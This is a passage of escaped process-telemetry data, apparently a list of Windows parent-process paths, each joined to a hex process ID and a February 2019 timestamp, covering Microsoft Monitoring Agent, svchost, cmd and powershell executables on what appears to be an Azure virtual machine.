state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12482019-02-10 08:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10442019-02-10 08:45:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf082019-02-10 08:48:32.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa782019-02-10 09:05:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-10 09:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x23d82019-02-10 09:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x3f82019-02-10 09:48:32.293000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x23b82019-02-10 09:55:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15482019-02-10 10:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10a82019-02-10 10:45:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x5a82019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf882019-02-10 10:48:32.310000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18b82019-02-10 11:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e82019-02-10 11:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1d042019-02-10 11:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xda82019-02-10 11:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1f202019-02-10 12:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xe3c2019-02-10 12:25:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fa42019-02-10 12:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x220c2019-02-10 12:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 13:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15702019-02-10 13:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 13:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x154c2019-02-10 13:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xc602019-02-10 14:05:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6382019-02-10 14:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15fc2019-02-10 14:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x1d382019-02-10 14:48:32.337000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17b02019-02-10 14:55:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x17d02019-02-10 15:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1fd02019-02-10 15:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x21202019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14ec2019-02-09 20:05:31.010000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 